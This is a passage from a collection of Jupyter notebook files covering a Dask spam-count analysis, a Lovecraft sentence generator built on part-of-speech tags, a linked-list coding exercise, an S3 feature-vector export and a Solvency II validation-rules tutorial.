],
[
"import matplotlib.pyplot as plt\nimport numpy as np",
"_____no_output_____"
],
[
"dask_df['dt'] = dask_df['DATE'].astype('M8[M]')",
"_____no_output_____"
],
[
"dask_df.head()",
"_____no_output_____"
],
[
"sorted_df = dask_df.set_index(['dt']).compute()",
"_____no_output_____"
],
[
"# Well, I was going to sort the values by month and then see how the spam counts changed over time\n# but, it looks like sorting in dask takes a bit more time than I want to give it right now",
"_____no_output_____"
]
],
[
[
"# Big Data Options",
"_____no_output_____"
],
[
"Considerations in Spark vs Dask",
"_____no_output_____"
],
[
"'",
"_____no_output_____"
],
[
"Common considerations in determining whether Spark or Dask is more appropriate in a given situation often come down to personal preference and experience, though there are a few functional restrictions in choosing one over the other. Among the initial considerations in choosing one over the other will be one's experience in python and potential prior experience in languages such as SQL or Scala. Dask is written and runs exclusively in python. Though this may sound restrictive, I appreciate the familiarity as Python is the language in which I have the greatest degree of experience. Because Dask uses the Pandas APIs, working with a Dask dataframe is only minimally different from a typical pandas dataframe. Spark, however, is written in Scala but provides support for both python and R while providing a moderately intuitive level of familiarity to those with experience in SQL. Rather than using APIs from a different language, as is the case with Dask and Pandas, Spark has its own set of APIs. Again, given my familiarity with python and Pandas, Dask continues to be my high-level, big data tool of choice. ",
"_____no_output_____"
]
]
] | [
"code",
"markdown"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb521aef2d8503275cca6f2565c69791220dfcc1 | 9,911 | ipynb | Jupyter Notebook | post_tag_based_generation.ipynb | diegojromerolopez/lovecraft-nlp-study | 73d743ab9ee369e94ef57a09bbcfed45508c1061 | [
"MIT"
] | 1 | 2018-02-25T15:24:17.000Z | 2018-02-25T15:24:17.000Z | post_tag_based_generation.ipynb | diegojromerolopez/lovecraft-nlp-study | 73d743ab9ee369e94ef57a09bbcfed45508c1061 | [
"MIT"
] | null | null | null | post_tag_based_generation.ipynb | diegojromerolopez/lovecraft-nlp-study | 73d743ab9ee369e94ef57a09bbcfed45508c1061 | [
"MIT"
] | null | null | null | 34.775439 | 292 | 0.52467 | [
[
[
"import nltk\nimport re\nimport operator\nfrom collections import defaultdict\nimport numpy as np\n\nimport matplotlib.pyplot as plt",
"_____no_output_____"
]
],
[
[
"The idea is generate more common sentences according to their word tagging. So the sentences will have the real structure written by lovecraft and composed by a list of most common words in that kind of sentence.\n\nThe result should be a somewhat real phrase.",
"_____no_output_____"
]
],
[
[
"lovecraft = nltk.corpus.PlaintextCorpusReader(\"lovecraft\", \".*\")",
"_____no_output_____"
],
[
"class TaggedWord(object):\n \n def __init__(self, words, count):\n self.word_hash = {}\n self.words = words\n self.count = count\n index = 0\n for word in words:\n self.word_hash[word] = index\n index += 1\n\n def update(self, word):\n word_index = self.word_hash.get(word)\n if word_index is not None:\n self.count[word_index] += 1\n else:\n self.words.append(word)\n self.count.append(1)\n word_index = len(self.words) - 1\n self.word_hash[word] = word_index\n \n def get_random(self, seed):\n np.random.seed(seed=seed)\n total_count = sum(self.count)\n probabilities = [word_count/total_count for word_count in self.count]\n random_word_chose = np.random.multinomial(1, probabilities)\n random_word_index = list(random_word_chose).index(1)\n return self.words[random_word_index]\n\n\nclass Sentence(object):\n \n def __init__(self, words, tags):\n self.tags = tags\n self.words = []\n for word in words:\n self.words.append(TaggedWord(words=[word.lower()], count=[1]))\n \n def update(self, words):\n word_index = 0\n for word in words:\n self.words[word_index].update(word.lower())\n word_index += 1\n \n def generate(self, seed):\n return [word.get_random(seed) for word in self.words]",
"_____no_output_____"
],
[
"lovecraft_sentences = lovecraft.sents()\nsentences = {}\nsentence_count = defaultdict(int)\nfor tokenized_sentence in lovecraft_sentences:\n sentence_with_tagged_words = nltk.pos_tag(tokenized_sentence)\n \n sentence_words = list(zip(*sentence_with_tagged_words))[0]\n sentence_tags = list(zip(*sentence_with_tagged_words))[1]\n \n sentence_checksum = \"-\".join(sentence_tags)\n \n if sentence_checksum in sentences:\n sentences[sentence_checksum].update(sentence_words)\n else:\n sentences[sentence_checksum] = Sentence(words=sentence_words, tags=sentence_tags)\n \n sentence_count[sentence_checksum] += 1",
"_____no_output_____"
],
[
"total_count = sum(sentence_count.values())\nsentence_tags = [_sentence_tags for _sentence_tags in sentences.keys()]\nsentence_probabilities = [sentence_count[sentence_tag]/total_count for sentence_tag in sentence_tags]\n\n\nfor i in range(0, 3):\n random_sentence_chose = np.random.multinomial(1, sentence_probabilities)\n random_sentence_index = list(random_sentence_chose).index(1)\n print(sentences[sentence_tags[random_sentence_index]].generate(0))",
"['the', 'bus', ',', 'rather', 'early', ',', 'rattled', 'in', 'with', 'three', 'passengers', 'somewhat', 'before', 'eight', ',', 'and', 'an', 'evil', '-', 'looking', 'fellow', 'on', 'the', 'sidewalk', 'muttered', 'a', 'few', 'indistinguishable', 'words', 'to', 'the', 'driver', '.']\n['there', 'seemed', 'virtually', 'nothing', 'to', 'do', 'to', 'calm', 'them', ',', 'and', 'when', 'nahum', 'opened', 'the', 'stable', 'door', 'they', 'all', 'bolted', 'out', 'like', 'frightened', 'woodland', 'deer', '.']\n['there', 'seemed', 'virtually', 'nothing', 'to', 'do', 'to', 'calm', 'them', ',', 'and', 'when', 'nahum', 'opened', 'the', 'stable', 'door', 'they', 'all', 'bolted', 'out', 'like', 'frightened', 'woodland', 'deer', '.']\n"
]
],
[
[
"The problem with that approach is that if the author uses a rich grammar (as it is the case of Lovecraft), not many phrases are gramatically repeated,\nso we get many unique tagged sentences as it happens here.",
"_____no_output_____"
]
],
[
[
"print(\"{} sentences are available and there are {} unique sentences (almost all)\".format(len(sentences), len([s for s, c in sentence_count.items() if c == 1])))\n\nprint(\"Sentences with more than one occurrence:\")\nfor cs, count in sentence_count.items():\n if count > 1:\n print(\"{}: {} times\".format(cs, count))",
"18893 sentences are available and there are 18811 unique sentences (almost all)\nSentences with more than one occurrence:\nDT-NNP: 8 times\nPRP-.: 8 times\nPRP: 8 times\nNN: 56 times\nDT-NNP-NNP-NNP-NNP: 8 times\nNNP-VBD-VBN-.: 3 times\nRB-DT-NN-VBD-.: 2 times\nPRP-VBD-DT-NN-.: 3 times\nDT-NN-VBD-RB-JJ-.: 2 times\nIN-NNP-NNP-NNP-NNP: 2 times\nDT-NN-.: 3 times\nDT-NNP-NNP-NNP-NNP-NNP: 3 times\n:-NN: 2 times\nDT-NNP-CC-DT-NNP-NNP-.: 3 times\nDT-NNP-CC-DT-NN: 4 times\nCD: 25 times\nNNP-.: 36 times\nPRP-VBD-:: 3 times\nNNP-VBD-RB-JJ-.: 2 times\nPRP-VBP-TO-PRP-VB-,-VB-RB-VB-RP-NNP-IN-PRP-MD-RB-VB-NNS-:-IN-DT-NNP-PRP-VBP-,-VBP-WDT-MD-IN-NNP-VB-RP-NNP-IN-PRP-,-VB-PRP$-NNP-NNPS-MD-RB-VB-IN-NN-.: 2 times\nNNP-IN-DT-NNP-,-IN-DT-NNP-MD-RB-VB-TO-NNP-,-CC-JJ-NN-JJR-IN-PRP-.: 2 times\nNNP-.-NNP-.: 3 times\nNNP: 4 times\nNNP-NNP-.: 6 times\nNN-.: 28 times\nNN-NNP-.: 5 times\nPOS-NNP-.: 3 times\nCD-.: 2 times\nNNP-NN-.: 3 times\nEX-VBD-DT-NN-.: 2 times\nPRP-VBD-IN-VBZ-:: 2 times\nJJ-NNP-NN: 2 times\nUH-.: 2 times\nDT-VBZ-DT-.: 2 times\nDT-NNP-NNP: 9 times\nNNP-NN: 3 times\nDT-VBD-DT-.: 4 times\nJJ-NNP-.: 8 times\nCC-DT-VBD-DT-.: 2 times\nRB-RB-.: 2 times\nNNP-NNP: 4 times\nDT-NNP-NNP-NNP: 6 times\nDT-NNP-IN-NNP-NNP: 2 times\nJJ-NNP-POS-JJ-NN-POS-NN-NNP-NNP-POS-NN-NN-''-JJ-NN-NN: 2 times\nDT-VBZ-RB-JJ-WDT-MD-VB-NN-,-CC-IN-JJ-NNS-RB-NN-MD-VB-.: 2 times\nDT-NNP-IN-DT-NNP: 2 times\nPRP-MD-VB-PRP-.: 3 times\nVB-PRP-.: 2 times\nNNP-:-NN-.: 10 times\nDT-NNP-IN-DT-NNP-NNP-NN: 2 times\nPRP-VBP-PRP-.: 2 times\nNN-CD: 5 times\nNN-NNP: 3 times\nJJ-IN-NN-.: 2 times\nRB-PRP-VBD-.: 3 times\nRB-VBD-DT-JJ-NN-.: 2 times\nNNP-,-NN-.: 5 times\nJJ-NN-.: 5 times\nDT-NNP-IN-DT-NNP-NNP-.: 2 times\nDT-NNP-IN-DT-NNS: 2 times\nNNP-POS-NNP-NNP: 2 times\nPRP-VBD-.: 5 times\nNNP-POS-NN-NN-''-JJ-NN-NN-''-NN-.: 2 times\nDT-NN-''-NN-.: 2 times\nJJ-CD-:-CD-NNP-.-NNP-.: 2 times\nNN-NNP-:-NN-.: 2 times\nNNP-:-NN-NN: 6 times\nDT-NN: 3 times\nNNP-VBD-PRP-.: 2 times\nNNS: 2 times\nIN-PRP-.: 2 times\nCD-,-DT-.: 5 times\nVBN-NNP-CD-IN-NNP-NNP-NNP-.: 4 times\nCD-,-NN-.-CD-:-CD-.: 3 times\nNN-NNP-:-DT-NNP-IN-DT-NNP: 2 times\nPOS-NNP-NN-CC-NN-IN-NN-,-NN-WP-VBP-IN-DT-NN-IN-NNS-CC-JJ-NN-,-WP-JJS-IN-DT-NN-IN-NNS-IN-DT-NNS-,-WP-JJS-IN-NN-CC-JJS-NN-TO-NNS-,-NNP-,-NNP-,-NN-RB-IN-PRP$-NNS-VBP: 2 times\nPRP$-JJ-NNP-:: 2 times\n(-DT-NNP-NNP-IN-NNP-NNP-): 2 times\n(-NNP-NNP-): 3 times\nNNP-:-NNP: 2 times\n(-NNP-NNP-NNP-): 2 times\n(-NNP-): 2 times\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb521b82dccdf33fb573e65bd38b240b017916cb | 3,519 | ipynb | Jupyter Notebook | Top 100 interview Questions/Linked list - 26. Reverse Linked List.ipynb | Daisy-Engineer/leetcode | 7f2037867ace40e84647ac2b2530a89a4b36fae7 | [
"Apache-2.0"
] | 1 | 2019-12-05T06:39:53.000Z | 2019-12-05T06:39:53.000Z | Top 100 interview Questions/Linked list - 26. Reverse Linked List.ipynb | Daisy-Engineer/leetcode | 7f2037867ace40e84647ac2b2530a89a4b36fae7 | [
"Apache-2.0"
] | null | null | null | Top 100 interview Questions/Linked list - 26. Reverse Linked List.ipynb | Daisy-Engineer/leetcode | 7f2037867ace40e84647ac2b2530a89a4b36fae7 | [
"Apache-2.0"
] | null | null | null | 35.19 | 1,080 | 0.561523 | [
[
[
"Reverse a singly linked list.\n\nExample:\n\nInput: 1->2->3->4->5->NULL\nOutput: 5->4->3->2->1->NULL",
"_____no_output_____"
]
],
[
[
"# Definition for singly-linked list.\n# useful Animation link: https://github.com/MisterBooo/LeetCodeAnimation/blob/master/notes/LeetCode%E7%AC%AC206%E5%8F%B7%E9%97%AE%E9%A2%98%EF%BC%9A%E5%8F%8D%E8%BD%AC%E9%93%BE%E8%A1%A8.md\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n if not head:\n return None\n prev = None\n cur = head\n while cur:\n cur.next, prev, cur = prev, cur, cur.next\n return prev\n\nl1 = [1,2,3]\np = Solution()\nprint(p.reverseList(ListNode().__init__(_,l1)))",
"_____no_output_____"
],
[
"head = [1,2,3,4]\n\ndef a(head):\n if not head:\n return 1\n\na(head)",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
]
] |
cb5222b500e3f8927390ff583fb8d913ae38ebda | 4,484 | ipynb | Jupyter Notebook | notebooks/image_pathways/notebooks/7. Save_all_FV_pathways.ipynb | wellcomecollection/data-science | b91b31c344e2d8ca43f1e3e92a7b361ba110f25b | [
"MIT"
] | 5 | 2019-12-07T09:29:38.000Z | 2021-09-02T09:46:56.000Z | notebooks/image_pathways/notebooks/7. Save_all_FV_pathways.ipynb | wellcomecollection/data-science | b91b31c344e2d8ca43f1e3e92a7b361ba110f25b | [
"MIT"
] | 37 | 2019-10-25T11:17:35.000Z | 2021-10-20T16:39:50.000Z | notebooks/image_pathways/notebooks/7. Save_all_FV_pathways.ipynb | wellcomecollection/data-science | b91b31c344e2d8ca43f1e3e92a7b361ba110f25b | [
"MIT"
] | 1 | 2021-01-14T18:14:52.000Z | 2021-01-14T18:14:52.000Z | 22.532663 | 133 | 0.556869 | [
[
[
"In this notebook we:\n- Load all the feature vectors from S3\n- Save them in .npy form",
"_____no_output_____"
]
],
[
[
"%load_ext autoreload\n%autoreload 2",
"_____no_output_____"
],
[
"from tqdm import tqdm\nimport os\nfrom io import BytesIO\nimport ast\nimport numpy as np\nimport pickle\nfrom itertools import compress\nfrom collections import Counter\nimport operator\nimport datetime\n\nfrom PIL import Image\nimport torch\nimport boto3\nfrom scipy.spatial.distance import cdist\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\nfrom itertools import combinations\nimport umap.umap_ as umap",
"_____no_output_____"
],
[
"cd ..",
"_____no_output_____"
],
[
"from src.network_functions import import_feature_vectors",
"_____no_output_____"
],
[
"# Get all the png image names from the data folder\nimages_dir = \"data/\"\nimage_type = \".png\"\n\nimage_names = os.listdir(images_dir)\nimage_names = [os.path.splitext(file)[0] for file in image_names if image_type in file]\nlen(image_names)",
"_____no_output_____"
]
],
[
[
"## Import all feature vectors",
"_____no_output_____"
]
],
[
[
"bucket_name = \"miro-images-feature-vectors\"\nfolder_name = \"feature_vectors\"\nn = 3 # This is what X degrees of separation uses 15, but perhaps this is too much, should it be a fraction of the n_sample?\ndist_threshold = 0.35\n\nbucket_name = bucket_name\ns3 = boto3.client(\"s3\")",
"_____no_output_____"
],
[
"feature_vectors, _ = import_feature_vectors(s3, bucket_name, folder_name, image_names)",
"_____no_output_____"
],
[
"len(feature_vectors)",
"_____no_output_____"
],
[
"# Remove the name of this image from the list if no feature vector was found for it\nimage_name_fv = [x for x in image_names if x in list(feature_vectors.keys())]",
"_____no_output_____"
],
[
"len(image_name_fv)",
"_____no_output_____"
],
[
"# Save\nnow = datetime.datetime.now()\ndate = now.strftime(\"%Y%m%d\")\nnp.save(\n \"data/{}_feature_vectors_ids\".format(date), np.array(list(feature_vectors.keys()))\n)\nnp.save(\n \"data/{}_feature_vectors\".format(date), np.array(list(feature_vectors.values()))\n)",
"_____no_output_____"
],
[
"print(\"data/{}_feature_vectors_ids\".format(date))\nprint(\"data/{}_feature_vectors\".format(date))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb523eaf4658a95fe6e2747214189c30a7e18af3 | 73,663 | ipynb | Jupyter Notebook | notebooks/Tutorial Evaluate DNBs Additional Validation Rules.ipynb | DeNederlandscheBank/data-quality-rules | 311487b8a9c97018c0a4c15ba1f95036c00b9e1a | [
"MIT"
] | 5 | 2020-09-22T07:32:49.000Z | 2021-07-09T19:52:58.000Z | notebooks/Tutorial Evaluate DNBs Additional Validation Rules.ipynb | DeNederlandscheBank/solvency2-rules | 311487b8a9c97018c0a4c15ba1f95036c00b9e1a | [
"MIT"
] | 27 | 2020-09-01T14:28:36.000Z | 2021-07-13T07:27:33.000Z | notebooks/Tutorial Evaluate DNBs Additional Validation Rules.ipynb | DeNederlandscheBank/solvency2-rules | 311487b8a9c97018c0a4c15ba1f95036c00b9e1a | [
"MIT"
] | 3 | 2021-01-19T14:59:41.000Z | 2022-03-23T09:51:25.000Z | 39.307898 | 911 | 0.369018 | [
[
[
"# Tutorial - Evaluate DNBs additional Rules",
"_____no_output_____"
],
[
"This notebook contains a tutorial for the evaluation of DNBs additional Rules for the following Solvency II reports:\n- Annual Reporting Solo (ARS); and\n- Quarterly Reporting Solo (QRS)\n\nBesides the necessary preparation, the tutorial consists of 6 steps:\n1. Read possible datapoints\n2. Read data\n3. Clean data\n4. Read additional rules\n5. Evaluate rules\n6. Save results",
"_____no_output_____"
],
[
"## 0. Preparation",
"_____no_output_____"
],
[
"### Import packages",
"_____no_output_____"
]
],
[
[
"import pandas as pd # dataframes\nimport numpy as np # mathematical functions, arrays and matrices\nfrom os.path import join, isfile # some os dependent functionality\nimport data_patterns # evaluation of patterns\nimport regex as re # regular expressions\nfrom pprint import pprint # pretty print\nimport logging",
"_____no_output_____"
]
],
[
[
"### Variables",
"_____no_output_____"
]
],
[
[
"# ENTRYPOINT: 'ARS' for 'Annual Reporting Solo' or 'QRS' for 'Quarterly Reporting Solo'\n# INSTANCE: Name of the report you want to evaluate the additional rules for\n\nENTRYPOINT = 'ARS' \nINSTANCE = 'ars_240_instance' # Test instances: ars_240_instance or qrs_240_instance",
"_____no_output_____"
],
[
"# DATAPOINTS_PATH: path to the excel-file containing all possible datapoints (simplified taxonomy)\n# RULES_PATH: path to the excel-file with the additional rules\n# INSTANCES_DATA_PATH: path to the source data\n# RESULTS_PATH: path to the results\n\nDATAPOINTS_PATH = join('..', 'data', 'datapoints')\nRULES_PATH = join('..', 'solvency2-rules')\nINSTANCES_DATA_PATH = join('..', 'data', 'instances', INSTANCE)\nRESULTS_PATH = join('..', 'results') ",
"_____no_output_____"
],
[
"# We log to rules.log in the data/instances path\n\nlogging.basicConfig(filename = join(INSTANCES_DATA_PATH, 'rules.log'),level = logging.INFO, \n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')",
"_____no_output_____"
]
],
[
[
"## 1. Read possible datapoints",
"_____no_output_____"
],
[
"In the data/datapoints directory there is a file for both ARS and QRS in which all possible datapoints are listed (simplified taxonomy). \nWe will use this information to add all unreported datapoints to the imported data.",
"_____no_output_____"
]
],
[
[
"df_datapoints = pd.read_csv(join(DATAPOINTS_PATH, ENTRYPOINT.upper() + '.csv'), sep=\";\").fillna(\"\") # load file to dataframe\ndf_datapoints.head()",
"_____no_output_____"
]
],
[
[
"## 2. Read data",
"_____no_output_____"
],
[
"We distinguish 2 types of tables: \n- With a closed-axis, e.g. the balance sheet: an entity reports only 1 balance sheet per period\n- With an open-axis, e.g. the list of assets: an entity reports several 'rows of data' in the relevant table",
"_____no_output_____"
],
[
"### General information",
"_____no_output_____"
],
[
"First we gather some general information:\n- A list of all possible reported tables\n- A list of all reported tables\n- A list of all tables that have not been reported",
"_____no_output_____"
]
],
[
[
"tables_complete_set = df_datapoints.tabelcode.sort_values().unique().tolist()\ntables_reported = [table for table in tables_complete_set if isfile(join(INSTANCES_DATA_PATH, table + '.pickle'))]\ntables_not_reported = [table for table in tables_complete_set if table not in tables_reported]",
"_____no_output_____"
]
],
[
[
"### Closed-axis",
"_____no_output_____"
],
[
"Besides all separate tables, the 'Tutorial Convert XBRL-instance to CSV, HTML and pickles' also outputs a large dataframe with the data from all closed-axis tables combined. \nWe use this dataframe for evaluating the patterns on closed-axis tables.",
"_____no_output_____"
]
],
[
[
"df_closed_axis = pd.read_pickle(join(INSTANCES_DATA_PATH, INSTANCE + '.pickle'))\ntables_closed_axis = sorted(list(set(x[:13] for x in df_closed_axis.columns)))\ndf_closed_axis.head()",
"_____no_output_____"
]
],
[
[
"### Open-axis",
"_____no_output_____"
],
[
"For open-axis tables we create a dictionary with all data per table. \nLater we will evaluate the additional rules on each seperate table in this dictionary.",
"_____no_output_____"
]
],
[
[
"dict_open_axis = {}\ntables_open_axis = [table for table in tables_reported if table not in tables_closed_axis]\n\nfor table in tables_open_axis:\n df = pd.read_pickle(join(INSTANCES_DATA_PATH, table + '.pickle'))\n \n # Identify which columns within the open-axis table make a table row unique (index-columns):\n index_columns_open_axis = [col for col in list(df.index.names) if col not in ['entity','period']]\n \n # Duplicate index-columns to data columns:\n df.reset_index(level=index_columns_open_axis, inplace=True)\n for i in range(len(index_columns_open_axis)):\n df['index_col_' + str(i)] = df[index_columns_open_axis[i]].astype(str)\n df.set_index(['index_col_' + str(i)], append=True, inplace=True)\n \n dict_open_axis[table] = df \n\nprint(\"Open-axis tables:\")\nprint(list(dict_open_axis.keys()))",
"Open-axis tables:\n['S.01.03.01.01', 'S.01.03.01.02', 'S.03.02.01.01', 'S.03.03.01.01', 'S.06.02.01.01', 'S.06.02.01.02', 'S.06.03.01.01', 'S.07.01.01.01', 'S.08.01.01.01', 'S.08.01.01.02', 'S.08.02.01.01', 'S.08.02.01.02', 'S.09.01.01.01', 'S.10.01.01.01', 'S.11.01.01.01', 'S.11.01.01.02', 'S.14.01.01.01', 'S.14.01.01.02', 'S.14.01.01.03', 'S.14.01.01.04', 'S.15.01.01.01', 'S.15.02.01.01', 'S.21.02.01.01', 'S.23.04.01.01', 'S.23.04.01.02', 'S.23.04.01.03', 'S.23.04.01.04', 'S.23.04.01.05', 'S.23.04.01.06', 'S.23.04.01.07', 'S.24.01.01.01', 'S.24.01.01.02', 'S.24.01.01.05', 'S.24.01.01.06', 'S.24.01.01.07', 'S.24.01.01.08', 'S.24.01.01.09', 'S.25.02.01.01', 'S.25.03.01.01', 'S.30.02.01.03', 'S.30.02.01.04', 'S.30.03.01.01', 'S.30.04.01.01', 'S.30.04.01.02', 'S.30.04.01.03', 'S.31.01.01.01', 'S.31.01.01.02', 'S.31.02.01.01', 'S.31.02.01.02', 'S.36.01.01.01', 'S.36.02.01.01', 'S.36.03.01.01', 'S.36.04.01.01']\n"
]
],
[
[
"## 3. Clean data",
"_____no_output_____"
],
[
"We have to make 2 modifications on the data:\n1. Add unreported datapoints \nso rules (partly) pointing to unreported datapoints can still be evaluated\n2. Change string values to uppercase \nbecause the additional rules are defined using capital letters for textual comparisons ",
"_____no_output_____"
]
],
[
[
"all_datapoints = [x.replace(',,',',') for x in \n list(df_datapoints['tabelcode'] + ',' + df_datapoints['rij'] + ',' + df_datapoints['kolom'])]\nall_datapoints_closed = [x for x in all_datapoints if x[:13] in tables_closed_axis]\nall_datapoints_open = [x for x in all_datapoints if x[:13] in tables_open_axis]",
"_____no_output_____"
]
],
[
[
"### Closed-axis tables",
"_____no_output_____"
]
],
[
[
"# add not reported datapoints to the dataframe with data from closed axis tables:\nfor col in [column for column in all_datapoints_closed if column not in list(df_closed_axis.columns)]:\n df_closed_axis[col] = np.nan\ndf_closed_axis.fillna(0, inplace = True)\n\n# string values to uppercase\ndf_closed_axis = df_closed_axis.applymap(lambda s:s.upper() if type(s) == str else s)",
"_____no_output_____"
]
],
[
[
"### Open-axis tables",
"_____no_output_____"
]
],
[
[
"for table in [table for table in dict_open_axis.keys()]:\n all_datapoints_table = [x for x in all_datapoints_open if x[:13] == table]\n for col in [column for column in all_datapoints_table if column not in list(dict_open_axis[table].columns)]:\n dict_open_axis[table][col] = np.nan\n dict_open_axis[table].fillna(0, inplace = True)\n \n dict_open_axis[table] = dict_open_axis[table].applymap(lambda s:s.upper() if type(s) == str else s)",
"_____no_output_____"
]
],
[
[
"## 4. Read additional rules",
"_____no_output_____"
],
[
"DNBs additional validation rules are published as an Excel file on the DNB statistics website. \nWe included the Excel file in the project under data/downloaded files.\n\nThe rules are already converted to a syntax Python can interpret, using the notebook: 'Convert DNBs Additional Validation Rules to Patterns'. \nIn the next line of code we read these converted rules (patterns).",
"_____no_output_____"
]
],
[
[
"df_patterns = pd.read_excel(join(RULES_PATH, ENTRYPOINT.lower() + '_patterns_additional_rules.xlsx'), engine='openpyxl').fillna(\"\").set_index('index')",
"_____no_output_____"
]
],
[
[
"## 5. Evaluate rules",
"_____no_output_____"
],
[
"### Closed-axis tables",
"_____no_output_____"
],
[
"To be able to evaluate the rules for closed-axis tables, we need to filter out:\n- patterns for open-axis tables; and\n- patterns pointing to tables that are not reported.",
"_____no_output_____"
]
],
[
[
"df_patterns_closed_axis = df_patterns.copy()\ndf_patterns_closed_axis = df_patterns_closed_axis[df_patterns_closed_axis['pandas ex'].apply(\n lambda expr: not any(table in expr for table in tables_not_reported) \n and not any(table in expr for table in tables_open_axis))]\ndf_patterns_closed_axis.head()",
"_____no_output_____"
]
],
[
[
"We now have:\n- the data for closed-axis tables in a dataframe;\n- the patterns for closed-axis tables in a dataframe.\n\nTo evaluate the patterns we need to create a 'PatternMiner' (part of the data_patterns package), and run the analyze function.",
"_____no_output_____"
]
],
[
[
"miner = data_patterns.PatternMiner(df_patterns=df_patterns_closed_axis)\ndf_results_closed_axis = miner.analyze(df_closed_axis)\ndf_results_closed_axis.head()",
"100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 212/212 [00:00<00:00, 502.85it/s]\n"
]
],
[
[
"### Open-axis tables",
"_____no_output_____"
],
[
"First find the patterns defined for open-axis tables",
"_____no_output_____"
]
],
[
[
"df_patterns_open_axis = df_patterns.copy()\ndf_patterns_open_axis = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(\n lambda expr: any(table in expr for table in tables_open_axis))]",
"_____no_output_____"
]
],
[
[
"Patterns involving multiple open-axis tables are not yet supported",
"_____no_output_____"
]
],
[
[
"df_patterns_open_axis = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(\n lambda expr: len(set(re.findall('S.\\d\\d.\\d\\d.\\d\\d.\\d\\d',expr)))) == 1]\ndf_patterns_open_axis.head()",
"_____no_output_____"
]
],
[
[
"Next we loop through the open-axis tables en evaluate the corresponding patterns on the data",
"_____no_output_____"
]
],
[
[
"output_open_axis = {} # dictionary with input and results per table\nfor table in tables_open_axis: # loop through open-axis tables\n if df_patterns_open_axis['pandas ex'].apply(lambda expr: table in expr).sum() > 0: # check if there are patterns\n info = {}\n info['data'] = dict_open_axis[table] # select data\n info['patterns'] = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(\n lambda expr: table in expr)] # select patterns\n miner = data_patterns.PatternMiner(df_patterns=info['patterns'])\n info['results'] = miner.analyze(info['data']) # evaluate patterns\n output_open_axis[table] = info",
"100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:00<00:00, 666.45it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 666.61it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:00<00:00, 666.45it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:00<00:00, 666.61it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 499.92it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 9/9 [00:00<00:00, 642.70it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 599.79it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 7/7 [00:00<00:00, 636.27it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 6/6 [00:00<00:00, 599.89it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 615.76it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:00<00:00, 571.45it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 7/7 [00:00<00:00, 636.20it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 555.42it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 666.71it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 624.84it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 499.82it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 428.41it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 499.90it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 428.43it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 400.03it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 499.86it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 428.49it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 499.77it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 624.88it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 6/6 [00:00<00:00, 461.41it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 428.49it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:00<00:00, 499.89it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 666.50it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 499.89it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 